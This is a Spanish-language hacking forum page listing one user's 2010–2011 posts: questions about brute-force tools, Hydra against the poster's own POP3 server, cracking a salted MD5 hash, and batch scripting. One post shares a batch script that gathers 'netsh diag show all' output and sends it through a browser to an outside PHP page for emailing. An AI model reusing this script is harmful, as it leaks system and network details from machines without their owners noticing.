elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 [2]
11  Seguridad Informática / Hacking / Cual es el mejor crackeador por fuerza bruta? en: 15 Abril 2011, 05:30 am
Bueno es q he probado algunos y la verdad no me han convensido pero a decir verdad he pensado por q puede ser q no me den la contraseña asi q puede ser q sea por el sistema de seguridad de donde los he ocupado aunque los he probado en sistemas inseguros y me arrojan todas las contraseñas como correctas o no me idetifican los protocolos o muchas cosas mas asi q me gustaria saber algun programa o tecnica de realizar brute force q les haya servido contra q (merefiero contra q dispositivo q protocolo o q ondas) o q va :)
12  Foros Generales / Foro Libre / quien es hacker? en: 13 Abril 2011, 13:33 pm
¿quien dice yo?
13  Seguridad Informática / Hacking / como funciona hydra? en: 9 Abril 2011, 19:28 pm
Bueno mas que como funciona me gustaria saber por q no me arroja la contraseña igual y estoy haciendo algo mal. Tengo un servidor de correo q soporta pop3 y quiero probar su seguridad pero antes de ponerle algun tipo de seguridad quiero probarlo con algun software de fuerza bruta o algo.

Entonces configure hydra para q hiciera el ataque pero lo unico q sale es ( se supone q es una conexion ssl)

Error preparing an SSL context: error:140BA0C3:lib(20):func(186):reason(195)

Cuando quito la opcion de ssl

Error: Not an POP3 protocol or service shutdown: (null)
Cosa q no es cierta

Asi q no se si sea la forma en la que estoy intentando no hay firewall no hay nada de seguridad a la hora de escanear los puertos me sale abierto el q configure para la conexion 995 y tiene como servicio pop3s asi q no se q pueda ser espero me puedan ayudar.

PD. No se si vaya en este foro es q no encontre alguno q dijera cracking y supuse podia ponerlo aqui :)

O alguna alternativa? :huh: :huh: :huh: :huh: :huh:
14  Seguridad Informática / Hacking / programa para enviar tramas de red en: 29 Marzo 2011, 22:29 pm
Es que este ultimo mes he estado buscando como enviar una trama no importa si es programa no importa si es programando el problema es q no logro enviarla.

Lo que tengo en mente es algo q vaya enviando byte por byte de la trama q yo diseñe es q he encontrado programas q te dejan cambiar algunos parametros de la trama como el tiempo de vida, macs, ips, etc,etc pero no he encontrado la forma de enviar alguna trama q yo diseñe.

***digamos q de alguna forma es lo opuesto a un sniffer

Bueno espero me puedan ayudar:) gracias
15  Seguridad Informática / Criptografía / descifrar md5 en: 7 Julio 2010, 01:49 am
No se si me puedan dar algo de informacion o herramientas para descifrar

Segun e investigado la encriptacion md5 consta de una funcion no reversible y la unica forma en la q pueden encontrar palabras encriptadas es por fuerza bruta. He visto q hay bases de datos online q permiten q encuentres algunas palabras q hayan sido colocadas dentro de su base de datos alguien tiene alguna otra manera de descifrar este tipo de codificacion?

Es q hay una palabra q no puedo descifrar debido a q esta de esta manera

md5("contraseña"+"palabra generada por un servidor")="hash en md5"

lo unico q tengo de esta es la palabra generada por el servidor y el hash en md5 pero la contraseña me esta siendo dificil encontrarla alguna idea????????????????????  :huh:
16  Seguridad Informática / Criptografía / ayuda para descifrar por favor :) en: 4 Julio 2010, 00:02 am
bueno tengo la siguiente palabra

af9083d4b82dbc0745b124db3b3cf15d:M0WuLowO4rtRTddG

Se q se supone q es "admin" en realidad pero me gustaria saber q tipo de encriptacion se ocupo o algo al respecto por q no he podido identificar el algoritmo espero me puedan ayudar por favor  :P
17  Programación / Scripting / ayuda con codigo batch en: 1 Junio 2010, 06:50 am
bueno tengo un problema y no se cual sea el problema es q me abre ventanas de cmd pero no me muestra los numeros si alguien me pueda decir por q  por q la verdad ya no se q pueda ser lo probe con

start "cmd %1 1" y con start"%1 1" y nomas no espero me puedan ayudar  :huh: :huh: :huh: :huh: :huh: :huh: :huh: :huh: :huh: :huh: :huh:

Código:

@echo on
IF [%1]==[] call :rutina & goto salto
IF %1==1 echo uno  & goto salto
IF %1==2 echo dos  & goto salto
IF %1==3 echo tres  & goto salto
IF %1==4 echo cuatro  & goto salto
IF %1==5 echo cinco  & goto salto
echo ni una
:salto
pause
exit

:rutina
echo empezo
start "%1 1"
start "cmd %1 1"
start "cmd %1 2"
start "cmd %1 3"
start "cmd %1 4"
start "cmd %1 5"
goto :EOF




 :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-( :-(
18  Programación / Scripting / codigo para enviar datos de computadora a correo en: 31 Mayo 2010, 09:34 am
Código
  1. @echo off
  2. call :obtenerdatos
  3. call :enviarcorreo
  4. :obtenerdatos
  5. echo http://pagina.enviarmensajes/index.php?mensaje=^" > "c:\archivo.txt"
  6. netsh diag show all >> "c:\archivo.txt"
  7. echo ^" >> "c:\archivo.txt"
  8. echo 'type "c:\archivo.txt"'
  9. goto :EOF
  10. :enviarcorreo
  11.  
  12. setlocal enabledelayedexpansion
  13. set SEPARATOR=/
  14. set filecontent=
  15. for /f "delims=" %%a in ('type "c:\archivo.txt"') do (
  16. set currentline=%%a
  17. set filecontent=!filecontent!!currentline!
  18. )
  19. start firefox %filecontent%
  20. goto :EOF

se agradece mucho a Leo Gutiérrez q resolvio una de las 2 dudas y cabe resaltar q la parte q coloca un archivo en una variable no es mio fue tomado de una pagina q no se cual es
lo unico q tienen q hacer para q corra a la perfeccion es hacer una pagina en un servidor q interprete php ( en este caso la ficticia http://pagina.enviarmensajes/index.php) donde envien un correo con una variable q se llame mensaje donde ira el cuerpo del mensaje solamente espero les guste si no pues ni pexx jajajajaj :laugh: :laugh:
19  Programación / Scripting / abrir pagina de internet desde batch[Solucionado] en: 31 Mayo 2010, 04:17 am
bueno espero q me puedan ayudar otra vez por aqui
estoy intentando hacer un batch q se comunique con una pagina php el problema es q no me pasa las variables como quiero. Lo que quiero es q pase las variables de comandos de la consola como ipconfig, netsh, netstat, etc.
bueno lo q intente y sirvio pero no al 100 fue

start firefox www.lapaginaquequiero.com/algunlugar.php?variable1=algo&variable2=algo

bueno como el & me causo problemas entonces modifique el php a forma de q solo tuviera q poner

start firefox www.lapaginaquequiero.com/algunlugar.php?variable1=algo

ahora el problema es q necesito q esa variable este llena de la salida de un archivo donde estan las salidas de los comandos juntas tambien intente poniendo en el archivo todo lo necesario para solo colocar un

start firefox 'type "%userprofile%\archivo.txt"'

ojala me puedan ayudar  :-(
20  Programación / Programación General / Asociar cualquier extensión para ser abiertas con la consola de windows en: 29 Mayo 2010, 03:58 am
bueno estoy intentando abrir cualquier programa como si fuera un .cmd no se si ustedes sepan el problema q tengo es q no me lo acepta lo intente de las siguientes formas:
start cmd programa.extension

no funciono despues intente

Reg add HKEY_CLASSES_ROOT\.extension /f /ve /t REG_SZ /d cmdfile

no funciono finalmente intente

Reg add HKEY_CLASSES_ROOT\.extensión\shell\open\command /f /ve /t REG_SZ /d %%0

y funciono pero no de la manera q quiero lo que quiero es q si se da dos clicks en algun programa con extensión ".extension" se abra mediante la consola.

de preferencia q sea con algo en batch si no no hay problema cualquier solucion es buena

espero me puedan ayudar y se agradecera


por favor me es algo urgente  :-[
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines